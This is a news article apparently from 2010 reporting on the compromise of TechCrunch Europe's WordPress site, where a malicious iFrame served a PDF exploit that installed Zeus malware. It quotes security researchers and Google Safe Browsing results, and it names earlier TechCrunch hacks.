TechCrunch Europe hacked to spread malware like a poison ivy infection

If you visited TechCrunch Europe on Monday, it would be wise to scan your computer for malware. By Monday night, the hack attack and malware issue was resolved. But during the day, security conscious or ticked off readers tweeted things like, "Warning! TechCrunch Europe serves up malware attack."  Other Twitter users tweeted thing like, "Hey @MobileCrunch & @TechCrunch - Why is your site flagged by Chrome as having Malware?"

MobileCrunch did not tweet a reply, but TechCrunch Europe acknowledged "the (annoying) malware warning", not once, but twice. Calling it annoying implies that it is not a security problem, when it very much would be both annoying and an issue had you been infected after visiting the site.

 

Graham Cluley, Senior Technology Consultant at Sophos, blogged, "A closer examination of TechCrunch Europe's site reveals that the offending code - which uses a malicious iFrame - is found in a JavaScript file, used by the site as part of its WordPress infrastructure. This attempts to serve up a malicious PDF file, exploiting a vulnerability that brings to your computer a nasty infection from the ZBot (also known as Zeus) malware family."

According to Trend Micro's Rik Ferguson, only 2 of 43 anti-malware programs would detect the malware. It was hosted by Netdirect on a server in Germany. Ferguson called the Zeus infection, the "Poison Ivy of the criminal underworld."

A quick Google Safe Browsing search of TechCrunch Europe's site shows suspicious activity twice over the last 90 days. "Of the 128 pages we tested on the site over the past 90 days, 58 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-06, and the last time suspicious content was found on this site was on 2010-09-06. Malicious software includes 2 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine."

This is not the first time TechCrunch has been hacked. A Google Safe Browsing search for TechCrunch shows, "Of the 1111 pages we tested on the site over the past 90 days, 58 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-06, and the last time suspicious content was found on this site was on 2010-09-06."

In January this year, TechCrunch was also hacked; defaced twice over a two day period while sometimes redirecting to a third party site. The U.S. Secret Service contacted TechCrunch about pressing charges. In March, Cnet's Elinor Mills reported that TechCrunch got hammered again with malware-laden ads.

Although TechCrunch has been hit several times now, sites that run WordPress have been heavily targeted the last few years. Due to the popularity of WordPress, it is a relatively easy target. TechCrunch has a huge user base. Some websites that are targeted have a hard time regaining visitors and good reputations.

Next time, we'll look at the recent attacks on web host (mt) Media Temple which is ranked the 36th most popular web host company in the world. MT responded when I asked about the swarm of infection in Media Temple sites and what, if anything, it is doing to help repair site owners' reputations.